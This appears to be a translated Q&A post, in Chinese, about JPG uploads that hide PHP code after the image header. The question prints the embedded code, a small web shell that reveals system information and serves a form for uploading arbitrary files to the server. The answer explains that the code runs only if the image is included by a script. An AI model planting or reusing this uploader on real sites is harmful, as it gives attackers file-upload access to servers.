用户上传了一些jpg图像,其中似乎包含一些php代码。文件以ÿØÿà开头,后面跟着NUL DLE JFIF NUL SOH SOH SOH NUL NUL NUL NUL ÿá NUL SYN Exif NUL NUL II*…(更多的空字符,等等)。然后输入以下php代码:
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
后面跟着很多二进制代码。图片显示了一只黑色的脚(就像把脚放在扫描仪或复印机上一样)。
这些图像有潜在危险吗?
是。这是一个利用已知漏洞的代码注入,详细阅读:http://php.webtutor.pl/en/2011/05/13/php-code-injection-a-simple-virus-written-in-php-and-carried-in-a-jpeg-image/
这些图像只有在你的php脚本使用require($image)或include($image)来显示你的图像时才会执行代码,否则,不用担心。不要忘记跟踪用户,并可能将其纳入黑名单:)